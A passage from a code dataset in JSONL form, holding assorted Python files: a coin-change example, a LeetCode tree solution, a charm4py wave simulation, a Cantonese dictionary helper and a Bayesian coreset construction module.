# to the _assignment\n if partition not in self._assignment:\n self._assignment.append(partition)\n","repo_name":"kpn/kstreams","sub_path":"kstreams/test_utils/test_clients.py","file_name":"test_clients.py","file_ext":"py","file_size_in_byte":8349,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"85"} +{"seq_id":"2220739784","text":"def vueltasProgDin(listaValoresMonedas,vueltas,minMonedas,monedasUsadas):\r\n for centavos in range(vueltas+1):\r\n conteoMonedas = centavos\r\n nuevaMoneda = 1\r\n #En este ciclo consideramos el uso de todas las monedas posibles para\r\n #dar las vueltas por la cantidad especificada por centavos\r\n for j in [m for m in listaValoresMonedas if m <= centavos]:\r\n if minMonedas[centavos-j] + 1 < conteoMonedas:\r\n conteoMonedas = minMonedas[centavos-j]+1\r\n nuevaMoneda = j\r\n minMonedas[centavos] = conteoMonedas\r\n monedasUsadas[centavos] = nuevaMoneda\r\n return minMonedas[vueltas]\r\n\r\ndef imprimirMonedas(monedasUsadas,vueltas):\r\n moneda = vueltas\r\n while moneda > 0:\r\n estaMoneda = monedasUsadas[moneda]\r\n print(estaMoneda)\r\n moneda = moneda - estaMoneda\r\n\r\ndef main():\r\n #Las dos primeras líneas de main fijan la cantidad a convertir y\r\n #crean la lista de monedas usadas.\r\n cantidad = 63\r\n listaM = [1,5,10,21,25]\r\n#líneas siguientes crean las listas que necesitamos para almacenar los resultados. \r\n monedasUsadas = [0]*(cantidad+1)\r\n#es el conteo de monedas usadas para dar el valor correspondiente a la posicion de la lista\r\n conteoMonedas = [0]*(cantidad+1)\r\n\r\n print(\"Dar unas vueltas de\",cantidad,\"centavos requiere\")\r\n print(vueltasProgDin(listaM,cantidad,conteoMonedas,monedasUsadas),\"monedas\")\r\n print(\"Tales monedas son:\")\r\n imprimirMonedas(monedasUsadas,cantidad)\r\n print(\"La lista usada es la siguiente:\")\r\n print(monedasUsadas)\r\n\r\nmain()\r\n","repo_name":"valeqdelc/resolver-problemas-mediante-busquedas","sub_path":"ejemplo2.py","file_name":"ejemplo2.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"3976257925","text":"import logging\nfrom pathlib import Path\n\nfrom stactools.sentinel5p import stac\n\n# import shutil\n\n\nlogging.basicConfig(level=0)\nlogging.getLogger(\"fsspec\").propagate = False\n\nroot = Path(__file__).parents[1]\nexamples = root / \"examples\"\ndata_files = root / \"tests\" / \"data-files\"\n\n# if examples.exists():\n# shutil.rmtree(examples)\n\n# examples.mkdir()\n\nfor path in data_files.glob(\"*.nc\"):\n item = stac.create_item(str(path))\n item.set_self_href(str(examples / item.id) + \".json\")\n item.make_asset_hrefs_relative()\n item.save_object(include_self_link=False)\n","repo_name":"stactools-packages/sentinel5p","sub_path":"scripts/create_examples.py","file_name":"create_examples.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"69954176597","text":"#\n# @lc app=leetcode.cn id=236 lang=python3\n#\n# [236] 二叉树的最近公共祖先\n#\n# https://leetcode-cn.com/problems/lowest-common-ancestor-of-a-binary-tree/description/\n#\n# algorithms\n# Medium (60.97%)\n# Likes: 574\n# Dislikes: 0\n# Total Accepted: 84.6K\n# Total Submissions: 132.7K\n# Testcase Example: '[3,5,1,6,2,0,8,null,null,7,4]\\n5\\n1'\n#\n# 给定一个二叉树, 找到该树中两个指定节点的最近公共祖先。\n#\n# 百度百科中最近公共祖先的定义为:“对于有根树 T 的两个结点 p、q,最近公共祖先表示为一个结点 x,满足 x 是 p、q 的祖先且 x\n# 的深度尽可能大(一个节点也可以是它自己的祖先)。”\n#\n# 例如,给定如下二叉树:  root = [3,5,1,6,2,0,8,null,null,7,4]\n#\n#\n#\n#\n#\n# 示例 1:\n#\n# 输入: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1\n# 输出: 3\n# 解释: 节点 5 和节点 1 的最近公共祖先是节点 3。\n#\n#\n# 示例 2:\n#\n# 输入: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4\n# 输出: 5\n# 解释: 节点 5 和节点 4 的最近公共祖先是节点 5。因为根据定义最近公共祖先节点可以为节点本身。\n#\n#\n#\n#\n# 说明:\n#\n#\n# 所有节点的值都是唯一的。\n# p、q 为不同节点且均存在于给定的二叉树中。\n#\n#\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':\n if not root:\n return None\n if not p:\n return q\n if not q:\n return p\n\n stack = [root] # 遍历\n paths = [[root]]\n findp = False\n findq = False\n pathp = None\n pathq = None\n while stack:\n if findp and findq:\n break\n node = stack.pop()\n path = paths.pop()\n # 处理\n if node == p:\n findp = True\n pathp = path+[node]\n if node == q:\n findq = True\n pathq = path+[node]\n\n # 遍历\n if node.right:\n stack.append(node.right)\n paths.append(path+[node.right])\n if node.left:\n stack.append(node.left)\n paths.append(path+[node.left])\n\n c = None\n while True:\n if pathp[0] == pathq[0]:\n c = pathp.pop(0)\n pathq.pop(0)\n else:\n break\n return c\n # @lc code=end\n","repo_name":"kangkang59812/LeetCode-python","sub_path":"236.二叉树的最近公共祖先.py","file_name":"236.二叉树的最近公共祖先.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"28738735501","text":"\n# This program solves the 2-d wave equation over a grid, displaying pretty results.\n# See README.rst for more information.\n\nfrom charm4py import charm, Chare, Array, coro, Channel, Future\nimport time\nimport math\nimport numpy as np\nimport numba\nimport random\ntry:\n import tkinter\n from PIL import Image, ImageTk, ImageDraw\nexcept ImportError:\n import sys\n sys.argv += ['--NO-RENDER']\n\n\nIMAGE_WIDTH, IMAGE_HEIGHT = 800, 699\nCHARE_ARRAY_WIDTH, CHARE_ARRAY_HEIGHT = 4, 3\nNUM_ITERATIONS = 3000\nNUM_INITIAL_PERTURBATIONS = 5\nLEFT, RIGHT, UP, DOWN = range(4)\nMAX_FRAMERATE = 60 # in frames per second. set -1 for unlimited\n\n\nclass Main(Chare):\n\n def __init__(self, args):\n self.RENDER = True\n try:\n args.remove('--NO-RENDER')\n self.RENDER = False\n except ValueError:\n pass\n\n print('\\nUsage: wave2d.py [num_iterations] [max_framerate])')\n global NUM_ITERATIONS, MAX_FRAMERATE\n if len(args) > 1:\n NUM_ITERATIONS = int(args[1])\n if len(args) > 2:\n MAX_FRAMERATE = int(args[2])\n\n print('Running wave2d on', charm.numPes(), 'processors for', NUM_ITERATIONS, 'iterations')\n print('Max framerate is', MAX_FRAMERATE, 'frames per second')\n\n self.count = 0 # tracks from how many workers I have received a subimage for this iteration\n programStartTime = frameStartTime = time.time()\n\n # Create new 2D array of worker chares\n array = Array(Wave, (CHARE_ARRAY_WIDTH, CHARE_ARRAY_HEIGHT))\n # tell all the worker chares to start the simulation\n array.work(self.thisProxy)\n\n if self.RENDER:\n tk = tkinter.Tk()\n self.frame = Image.new('RGB', (IMAGE_WIDTH, IMAGE_HEIGHT))\n img = ImageTk.PhotoImage(self.frame)\n label_image = tkinter.Label(tk, image=img)\n label_image.pack()\n\n self.frameReady = Future()\n for i in range(NUM_ITERATIONS):\n self.frameReady.get() # wait for the next frame\n if MAX_FRAMERATE > 0:\n elapsed = time.time() - frameStartTime\n if elapsed < 1/MAX_FRAMERATE:\n # enforce framerate\n charm.sleep(1/MAX_FRAMERATE - elapsed)\n if self.RENDER:\n fps = round(1/(time.time() - frameStartTime))\n # draw frames per second value on image\n d = ImageDraw.Draw(self.frame)\n d.text((10,10), str(fps) + ' fps', fill=(0,0,0,255))\n img = ImageTk.PhotoImage(self.frame)\n label_image.configure(image=img)\n label_image.image = img\n tk.update_idletasks()\n tk.update()\n\n # loop simulation every 1000 iterations\n reset = (i % 1000 == 0)\n frameStartTime = time.time()\n array.resume(reset) # tell workers to resume\n self.frameReady = Future()\n\n print('Program Done!, Total time=', time.time() - programStartTime)\n exit()\n\n # every worker calls this method to deposit their subimage\n def depositSubImage(self, data, pos, img_size):\n self.count += 1\n if self.RENDER:\n self.frame.paste(Image.frombytes('RGB', img_size, data), box=pos)\n if self.count == CHARE_ARRAY_WIDTH * CHARE_ARRAY_HEIGHT:\n # received image data from all chares\n self.count = 0\n self.frameReady() # signal main that the next frame is ready\n\n\nclass Wave(Chare):\n\n def setInitialConditions(self):\n # setup some initial pressure pertubations for timesteps t-1 and t\n self.pressure_new = np.zeros((self.myheight, self.mywidth)) # time t+1\n self.pressure = np.zeros((self.myheight, self.mywidth)) # time t\n self.pressure_old = np.zeros((self.myheight, self.mywidth)) # time t-1\n init_pressure(NUM_INITIAL_PERTURBATIONS, IMAGE_WIDTH, IMAGE_HEIGHT,\n self.mywidth, self.myheight, self.thisIndex,\n self.pressure, self.pressure_old)\n\n def resume(self, reset=False):\n self.resumeFuture(reset)\n\n @coro\n def work(self, mainProxy):\n \"\"\" this is the main simulation loop for each chare \"\"\"\n\n # size of my rectangular portion of the image\n self.mywidth = IMAGE_WIDTH // CHARE_ARRAY_WIDTH\n self.myheight = IMAGE_HEIGHT // CHARE_ARRAY_HEIGHT\n self.setInitialConditions()\n\n i = self.thisIndex\n X, Y = CHARE_ARRAY_WIDTH, CHARE_ARRAY_HEIGHT\n # establish a Channel with neighbor chares in the 2D grid\n left = Channel(self, remote=self.thisProxy[(i[0]-1)%X, i[1]])\n right = Channel(self, remote=self.thisProxy[(i[0]+1)%X, i[1]])\n top = Channel(self, remote=self.thisProxy[i[0], (i[1]-1)%Y])\n bottom = Channel(self, remote=self.thisProxy[i[0], (i[1]+1)%Y])\n\n width, height = self.mywidth, self.myheight\n # coordinate where my portion of the image is located\n sx = self.thisIndex[0] * width\n sy = self.thisIndex[1] * height\n # data will store my portion of the image\n data = np.zeros(width*height*3, dtype=np.uint8)\n buffers = [None] * 4\n\n # run simulation now\n while True:\n top_edge = self.pressure[[0],:].reshape(width)\n bottom_edge = self.pressure[[-1],:].reshape(width)\n left_edge = self.pressure[:,[0]].reshape(height)\n right_edge = self.pressure[:,[-1]].reshape(height)\n\n # send ghost values to neighbors\n left.send(RIGHT, left_edge)\n right.send(LEFT, right_edge)\n bottom.send(UP, bottom_edge)\n top.send(DOWN, top_edge)\n\n # receive ghost values from neighbors. iawait iteratively yields\n # channels as they become ready (have data to receive)\n for channel in charm.iwait((left, right, bottom, top)):\n side, ghost_values = channel.recv()\n buffers[side] = ghost_values\n\n check_and_compute(height, width,\n buffers[LEFT], buffers[RIGHT], buffers[UP], buffers[DOWN],\n self.pressure, self.pressure_old, self.pressure_new)\n\n # advance to next step by shifting the data back one step in time\n self.pressure_old, self.pressure, self.pressure_new = self.pressure, self.pressure_new, self.pressure_old\n\n # draw my part of the image, plus a nice 1 pixel border along my\n # right/bottom boundary\n fill_subimage(data, width, height, self.pressure)\n # provide my portion of the image to the mainchare\n mainProxy.depositSubImage(data, (sx, sy), (width, height))\n # wait for message from mainchare to resume simulation\n self.resumeFuture = Future()\n reset = self.resumeFuture.get()\n if reset:\n self.setInitialConditions()\n\n\n@numba.jit(nopython=True, cache=False)\ndef check_and_compute(h, w, left, right, up, down,\n pressure, pressure_old, pressure_new):\n for i in range(h):\n for j in range(w):\n # current time's pressures for neighboring array locations\n if j == 0: L = left[i]\n else: L = pressure[i,j-1]\n\n if j == w-1: R = right[i]\n else: R = pressure[i,j+1]\n\n if i == 0: U = up[j]\n else: U = pressure[i-1,j]\n\n if i == h-1: D = down[j]\n else: D = pressure[i+1,j]\n\n # current time's pressure for this array location\n curr = pressure[i,j]\n\n # previous time's pressure for this array location\n old = pressure_old[i,j]\n\n # compute the future time's pressure for this array location\n pressure_new[i,j] = 0.4*0.4*(L+R+U+D - 4.0*curr)-old+2.0*curr\n\n\n@numba.jit(nopython=True, cache=False)\ndef fill_subimage(data, w, h, pressure):\n # set the output pixel values for my rectangle\n # Each RGB component is a uint8 that can have 256 possible values\n for i in range(h):\n for j in range(w):\n p = int(pressure[i,j])\n if p > 255: p = 255 # Keep values in valid range\n if p < -255: p = -255 # Keep values in valid range\n pos = 3*(i*w+j)\n if p > 0: # Positive values are red\n data[pos:pos+3] = (255, 255-p, 255-p)\n else: # Negative values are blue\n data[pos:pos+3] = (255+p, 255+p, 255)\n\n # Draw a green border on right and bottom of this chare array's pixel buffer.\n # This will overwrite some pressure values at these pixels.\n for i in range(h):\n pos = 3*(i*w+w-1)\n data[pos:pos+3] = (0, 255, 0)\n for i in range(w):\n pos = 3*((h-1)*w+i)\n data[pos:pos+3] = (0, 255, 0)\n\n\n@numba.jit(nopython=True, cache=False)\ndef init_pressure(numInitialPerturbations, W, H, w, h, elemIdx, pressure, pressure_old):\n # force the same random numbers to be used for each chare array element\n random.seed(6)\n for s in range(numInitialPerturbations):\n # determine where to place a circle within the interior of the 2D domain\n radius = 20 + random.randint(0,32767) % 30\n xcenter = radius + random.randint(0,32767) % (W - 2*radius)\n ycenter = radius + random.randint(0,32767) % (H - 2*radius)\n # draw the circle\n for i in range(h):\n for j in range(w):\n # the coordinate in the global data array (not just in this chare's portion)\n globalx = elemIdx[0]*w + j\n globaly = elemIdx[1]*h + i\n distanceToCenter = math.sqrt((globalx-xcenter)**2 + (globaly-ycenter)**2)\n if distanceToCenter < radius:\n rscaled = (distanceToCenter/radius)*3.0*3.14159/2.0 # ranges from 0 to 3pi/2\n t = 700.0 * math.cos(rscaled) # range won't exceed -700 to 700\n pressure[i,j] = pressure_old[i,j] = t\n\n\ncharm.start(Main)\n","repo_name":"UIUC-PPL/charm4py","sub_path":"examples/wave2d/wave2d.py","file_name":"wave2d.py","file_ext":"py","file_size_in_byte":10054,"program_lang":"python","lang":"en","doc_type":"code","stars":281,"dataset":"github-code","pt":"85"} +{"seq_id":"9681979334","text":"# To rearrange a sorted array in the max min form.\n# for e.g. given_array = [1,2,3,4,5,6,7,8,9]\n# answer_array = [9,1,8,2,7,3,6,4,5]\n\ndef Convert_to_max_min(arr, n):\n temp_arr = []\n\n # to denote the begining of the array\n start = 0\n\n # to denote the end of the array\n end = n-1\n\n max = True\n while start <= end:\n if max:\n temp_arr.append(arr[end])\n end -=1\n max = False\n else:\n temp_arr.append(arr[start])\n start +=1\n max = True\n\n return temp_arr\n\n# Code to run the program\narr = [1, 2, 3, 4, 5, 6, 7, 8, 9]\nn = len(arr)\nprint(\"Given Array\")\nprint(arr)\nprint(\"Answer Array\")\nprint(Convert_to_max_min(arr, n))","repo_name":"kalrashivam/python_algorithms","sub_path":"Rearrange_sorted_array_to_max_min_form.py","file_name":"Rearrange_sorted_array_to_max_min_form.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"16029050400","text":"\"\"\"\n=====================================================\nGeração de sensibilidades de mercado no sistema.dat\n=====================================================\n\"\"\"\n\n\n# %%\n# Para realizar a análise do sistema.dat, será utilizado o módulo plotly\nfrom datetime import datetime\nimport pandas as pd\nimport plotly.graph_objects as go\nimport plotly.io as pio\n\npio.templates.default = \"ggplot2\"\n\n\n# %%\n# O sistema.dat é o arquivo de entrada do modelo NEWAVE que contém informações\n# sobre os submercados de energia. Em particular, são definidos os submercados\n# e as curvas de mercado de energia esperado por estágio, para cada um.\n# É uma análise comum a análise de sensibilidades em relação ao mercado de energia\n# e à geração das usinas não simuladas e, por isso, será ilustrado um exemplo deste caso.\nfrom inewave.newave import Sistema\n\narq_sistema = Sistema.read(\"./newave/sistema.dat\")\n\n# %%\n# A definição dos submercados é acessível através do bloco que define os custos de déficit\narq_sistema.custo_deficit.iloc[:, :4]\n\n# %%\n# As informações de mercado de energia são reunidas em uma única propriedade\n# e esta pode ser alterada livremente\narq_sistema.mercado_energia.iloc[:, :4]\n\n\n# %%\n# Será feito um gráfico de área empilhado. Para isso, serão geradas algumas variáveis auxiliares.\ndf = arq_sistema.mercado_energia\nanos = df[\"ano\"].unique().tolist()\nano_inicio = anos[0]\nano_fim = anos[-1]\nx = pd.date_range(\n datetime(year=int(ano_inicio), month=1, day=1),\n datetime(year=int(ano_fim), month=12, day=1),\n freq=\"MS\",\n)\n\n# %%\n# Para a figura, são geradas as retas independentemente\nfig = go.Figure()\nfor submercado in df[\"submercado\"].unique():\n df_sbm = df.loc[df[\"submercado\"] == submercado].drop(\n columns=[\"submercado\", \"ano\"]\n )\n fig.add_trace(\n go.Scatter(\n x=x,\n y=df_sbm.to_numpy().flatten(),\n mode=\"lines\",\n stackgroup=\"one\",\n name=str(submercado),\n )\n )\n\nfig.update_xaxes(title=\"Data\")\nfig.update_yaxes(title=\"Mercado de Energia (MWmes)\")\nfig.update_layout(legend_title_text=\"Submercado\")\nfig\n\n# %%\n# É possível realizar edições livres na propriedade do arquivo, para geração de estudos\n# de sensibilidades. Por exemplo, é possível aumentar a carga do submercado NORDESTE\n# em 30% e conferir o efeito na operação com a execução do modelo.\ncolunas_meses = arq_sistema.mercado_energia.columns.tolist()[2:]\narq_sistema.mercado_energia.loc[\n arq_sistema.mercado_energia[\"submercado\"] == 3, colunas_meses\n] *= 1.3\n\nfrom io import StringIO\n\nconteudo_sistema = StringIO()\narq_sistema.write(conteudo_sistema)\nprint(conteudo_sistema.getvalue())\n","repo_name":"rjmalves/inewave","sub_path":"examples/plot_sistema.py","file_name":"plot_sistema.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"pt","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"72088624598","text":"\"\"\"\nAn example database plugin.\nYou can use whatever database you like\nor even store pickled python objects.\n\nDo not forget about connection timeouts when connecting\nto external databases.\n\"\"\"\n\nfrom nodeforge.PluginUtils import *\nimport sqlite3\n\nclass Main(Plugin):\n\n def onLoad(self):\n \"\"\"\n Load the sql file.\n \"\"\"\n \n def newconnection():\n connection = sqlite3.connect('db.sql', isolation_level = None)\n connection.text_factory = str\n return connection\n \n # use these in the main thread\n self.connection = newconnection()\n self.cursor = self.connection.cursor()\n \n # call this to get a new cursor for a different thread to use\n self.newcursor = lambda: newconnection().cursor()\n \n \n self.cursor.execute(\n \"CREATE TABLE IF NOT EXISTS users (op NUMERIC, name PRIMARY KEY, quit REAL,\\\n lastchat TEXT, lastchattime REAL, email NONE, banned NUMERIC)\")","repo_name":"impredicative/nodeforge","sub_path":"src/plugins/dc/Database/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"74469199319","text":"# # maxamize it\n# 3 1000\n# 2 5 4\n# 3 7 8 9\n# 5 5 7 8 9 10\n\n# name, *line = input().split()\n# scores = list(map(float, line))\n\n# x, y = map(int, raw_input().split()) input in one line\n\n\nimport itertools\n\nk, m = map(int, input().strip().split(' '))\na = []\nfor i in range(k):\n t = list(map(int, input().split()))\n a.append(t)\n\n# print(a)\n\nmx = 0\nfor tp in itertools.product(*a):\n print(tp)\n res = sum([x**2 for x in tp]) % m\n print(res)\n if res > mx:\n mx = res\n\nprint(mx)\n","repo_name":"bhanupratapsinghcs/python","sub_path":"Hacker Rank Python problems/maximize.py","file_name":"maximize.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"23292771318","text":"# This is program is about create the dict for text\nimport pycantonese as pc\nimport re\nclass Linguistic_DICT(object):\n \"\"\"\n Read different kinds of dict\n \"\"\"\n def get_POS_dict(self, dict_file):\n _dict = {}\n try:\n with open(dict_file, 'r') as f:\n for line in f:\n (num, pos) = line.strip().split(' ')\n _dict[pos] = num\n except:\n print(\"Error: Fail to open %s\" % dict_file)\n return _dict\n\n def get_phone_dict(self, dict_file):\n # pdb.set_trace()\n # pdb.set_trace()\n _dict = {}\n try:\n with open(dict_file, 'r') as f:\n for line in f:\n (phone, num) = line.strip().split(' ')\n _dict[phone] = num\n except:\n print(\"Error: Fail to open %s\" % dict_file)\n return _dict\n\n def search_single_char(self, word_dict, m_char):\n # search single char in word dict\n for key, value in word_dict.items():\n if m_char in key:\n m_index = list(key).index(m_char)\n jp = pc.parse_jyutping(value)\n jp_index = ''.join(list(jp[m_index]))\n return jp_index\n def get_lexicon_dict(self, lexicon_path):\n with open(lexicon_path, 'r') as fid:\n lex_lines = fid.readlines()\n _dict = {}\n for tline in lex_lines:\n tline = tline.strip()\n lex_list = re.split('\\s+',tline)\n _dict[lex_list[0]] = lex_list[1:]\n return _dict","repo_name":"patrick-g-zhang/cFrontEnd","sub_path":"src/linguistic_dict.py","file_name":"linguistic_dict.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"1467636630","text":"#!/usr/bin/env python3\nimport logging\nimport random\n\nimport numpy as np\nfrom scipy.optimize import minimize\nimport matplotlib.pyplot as plt\nfrom bayesiancoresets import HilbertCoreset\nfrom bayesiancoresets import BlackBoxProjector\nfrom gaussian import GaussianDistribution\nfrom utils import get_cfg_data\nimport examples.common.model_lr as m_lr\nimport scipy.linalg as sl\nimport bayesiancoresets.util as bc_util\nimport os, sys\nimport argparse\nimport time\nimport bayesiancoresets as bc\n# make it so we can import models/etc from parent folder\nsys.path.insert(1, os.path.join(sys.path[0], '../..'))\nsys.path.insert(1, os.path.join(sys.path[0], '../common'))\nimport examples.common.model_gaussian as gaussian\n\n\nclass SimpleLRBayesianCoreset(object):\n\n def __init__(self, gd_distribution):\n self.coreset_threshold = 200\n self.gd_distribution = gd_distribution\n logging.info('Construct a simple bayesian coreset!')\n\n def construct_bayesian_coreset(self):\n Z = self.gd_distribution\n # Here we use the laplace approximation of the posterior\n # first, optimize the log joint to find the mode:\n res = minimize(lambda mu: -m_lr.log_joint(Z, mu, np.ones(Z.shape[0]))[0], Z.mean(axis=0),\n jac=lambda mu: -m_lr.grad_th_log_joint(Z, mu, np.ones(Z.shape[0]))[0, :])\n # then find a quadratic expansion around the mode, and assume the distribution is Gaussian\n mu = res.x\n cov = -np.linalg.inv(m_lr.hess_th_log_joint(Z, mu, np.ones(Z.shape[0]))[0, :, :])\n projection_dim = 500 # random projection dimension\n sampler = lambda sz, w, p: np.atleast_2d(np.random.multivariate_normal(mu, cov, sz))\n projector = BlackBoxProjector(sampler, projection_dim, m_lr.log_likelihood)\n coreset = HilbertCoreset(Z, projector)\n coreset.build(self.coreset_threshold) # build the coreset to size M with at most M iterations\n wts, pts, idcs = coreset.get()\n plt.scatter(self.gd_distribution[idcs][:, 0], self.gd_distribution[idcs][:, 1], c='r', marker='*')\n plt.title('Bayesian coreset', fontsize='xx-large', fontweight='heavy')\n plt.show()\n return idcs\n\n\nclass BayesianCoreset(object):\n\n def __init__(self):\n cfg = get_cfg_data()\n self.gd_obj = GaussianDistribution(cfg['space-version']['type'], cfg['guassian-params']['items'])\n self.g_params_list = cfg['guassian-params']['items']\n logging.info('Construct a Gaussian bayesian coreset!')\n\n def construct_bayesian_coreset(self, distribution, arguments, distribution_type, gm_result):\n #######################################\n #######################################\n ## Step 0: Setup\n #######################################\n #######################################\n np.random.seed(arguments.trial)\n bc_util.set_verbosity(arguments.verbosity)\n Ms = arguments.coreset_size_max\n # w = []\n # p = []\n\n final_coreset_points = []\n if distribution_type == 'guassian':\n last_index = 0\n for g_param in self.g_params_list:\n loc_data = np.array([float(val) for val in g_param['loc'].split(' ')])\n scale_data = np.array([float(val) for val in g_param['scale'].split(' ')])\n size_data = [int(val) for val in g_param['size'].split(' ')]\n #######################################\n #######################################\n ## Step 1: Generate a Synthetic Dataset\n #######################################\n #######################################\n mu0 = np.array(loc_data)\n Sig0 = np.array([\n [scale_data[0], 0],\n [0, scale_data[1]]\n ])\n Sig = np.array([\n [scale_data[0], 0],\n [0, scale_data[1]]\n ])\n\n # these are computed\n Sig0inv = np.linalg.inv(Sig0)\n Siginv = np.linalg.inv(Sig)\n LSigInv = np.linalg.cholesky(Siginv) # Siginv = LL^T, L Lower tri\n USig = sl.solve_triangular(\n LSigInv, np.eye(LSigInv.shape[0]), lower=True, overwrite_b=True, check_finite=False).T # Sig = UU^T, U upper tri\n # th = np.ones(arguments.data_dim)\n th = np.array(loc_data)\n logdetSig = np.linalg.slogdet(Sig)[1]\n #######################################\n #######################################\n ## Step 2: Calculate Likelihoods/Projectors\n #######################################\n #######################################\n # print('Computing true posterior')\n start_index = last_index\n end_index = last_index + size_data[0]\n x = distribution[start_index: end_index]\n last_index += size_data[0]\n # x = np.random.multivariate_normal(th, Sig, arguments.data_num)\n mup, USigp, LSigpInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, x, np.ones(x.shape[0]))\n Sigp = USigp.dot(USigp.T)\n SigpInv = LSigpInv.dot(LSigpInv.T)\n\n sub_coreset = self._get_bayesian_sub_coreset(\n Siginv, logdetSig, mup, USigp, x, mu0, Sig0inv, LSigInv, Ms, arguments)\n final_coreset_points += sub_coreset\n else:\n _mean = gm_result[0][0]\n _cov = gm_result[1][0]\n mu0 = _mean\n Sig0 = _cov\n Sig = _cov\n # these are computed\n Sig0inv = np.linalg.inv(Sig0)\n Siginv = np.linalg.inv(Sig)\n LSigInv = np.linalg.cholesky(Siginv) # Siginv = LL^T, L Lower tri\n USig = sl.solve_triangular(\n LSigInv, np.eye(LSigInv.shape[0]), lower=True, overwrite_b=True,\n check_finite=False).T # Sig = UU^T, U upper tri\n # th = np.ones(arguments.data_dim)\n th = gm_result[0]\n logdetSig = np.linalg.slogdet(Sig)[1]\n #######################################\n #######################################\n ## Step 2: Calculate Likelihoods/Projectors\n #######################################\n #######################################\n # print('Computing true posterior')\n x = distribution\n mup, USigp, LSigpInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, x, np.ones(x.shape[0]))\n Sigp = USigp.dot(USigp.T)\n SigpInv = LSigpInv.dot(LSigpInv.T)\n\n sub_coreset = self._get_bayesian_sub_coreset(\n Siginv, logdetSig, mup, USigp, x, mu0, Sig0inv, LSigInv, Ms, arguments)\n final_coreset_points += sub_coreset\n\n # num_diff = Ms - len(final_coreset_points)\n # random.choices(distribution, k=num_diff)\n for point in final_coreset_points:\n plt.scatter(\n point[0], point[1], c='r', marker='*'\n )\n plt.title('Bayesian coreset', fontsize='xx-large', fontweight='heavy')\n plt.show()\n return final_coreset_points\n\n def _get_bayesian_sub_coreset(self, Siginv, logdetSig, mup, USigp, x, mu0, Sig0inv, LSigInv, Ms, arguments):\n # create the log_likelihood function\n # print('Creating log-likelihood function')\n log_likelihood = lambda x, th: gaussian.log_likelihood(x, th, Siginv, logdetSig)\n\n # print('Creating gradient log-likelihood function')\n grad_log_likelihood = lambda x, th: gaussian.grad_x_log_likelihood(x, th, Siginv)\n\n # print('Creating tuned projector for Hilbert coreset construction')\n # create the sampler for the \"optimally-tuned\" Hilbert coreset\n sampler_optimal = lambda n, w, pts: mup + np.random.randn(n, mup.shape[0]).dot(USigp.T)\n prj_optimal = bc.BlackBoxProjector(sampler_optimal, arguments.proj_dim, log_likelihood, grad_log_likelihood)\n\n # print('Creating untuned projector for Hilbert coreset construction')\n # create the sampler for the \"realistically-tuned\" Hilbert coreset\n xhat = x[np.random.randint(0, x.shape[0], int(np.sqrt(x.shape[0]))), :]\n muhat, USigHat, LSigHatInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, xhat, np.ones(xhat.shape[0]))\n sampler_realistic = lambda n, w, pts: muhat + np.random.randn(n, muhat.shape[0]).dot(USigHat.T)\n prj_realistic = bc.BlackBoxProjector(sampler_realistic, arguments.proj_dim, log_likelihood,\n grad_log_likelihood)\n\n # print('Creating black box projector')\n\n def sampler_w(n, wts, pts):\n if wts is None or pts is None or pts.shape[0] == 0:\n wts = np.zeros(1)\n pts = np.zeros((1, mu0.shape[0]))\n muw, USigw, _ = gaussian.weighted_post(mu0, Sig0inv, Siginv, pts, wts)\n return muw + np.random.randn(n, muw.shape[0]).dot(USigw.T)\n\n prj_bb = bc.BlackBoxProjector(sampler_w, arguments.proj_dim, log_likelihood, grad_log_likelihood)\n\n # print('Creating exact projectors')\n\n # TODO need to fix all the transposes in this...\n class GaussianProjector(bc.Projector):\n def project(self, pts, grad=False):\n nu = (pts - self.muw).dot(LSigInv)\n PsiL = LSigInv.T.dot(self.USigw)\n Psi = PsiL.dot(PsiL.T)\n nu = np.hstack(\n (nu.dot(PsiL),\n np.sqrt(0.5 * np.trace(np.dot(Psi.T, Psi))) * np.ones(nu.shape[0])[:, np.newaxis]))\n nu *= np.sqrt(nu.shape[1])\n if not grad:\n return nu\n else:\n gnu = np.hstack((LSigInv.dot(PsiL), np.zeros(pts.shape[1])[:, np.newaxis])).T\n gnu = np.tile(gnu, (pts.shape[0], 1, 1))\n gnu *= np.sqrt(gnu.shape[1])\n return nu, gnu\n\n def update(self, wts=None, pts=None):\n if wts is None or pts is None or pts.shape[0] == 0:\n wts = np.zeros(1)\n pts = np.zeros((1, mu0.shape[0]))\n self.muw, self.USigw, self.LSigwInv = gaussian.weighted_post(mu0, Sig0inv, Siginv, pts, wts)\n\n prj_optimal_exact = GaussianProjector()\n prj_optimal_exact.update(np.ones(x.shape[0]), x)\n prj_realistic_exact = GaussianProjector()\n prj_realistic_exact.update(np.ones(xhat.shape[0]), xhat)\n\n #######################################\n #######################################\n ## Step 3: Construct Coreset\n #######################################\n #######################################\n\n # print('Creating coreset construction objects')\n # create coreset construction objects\n sparsevi_exact = 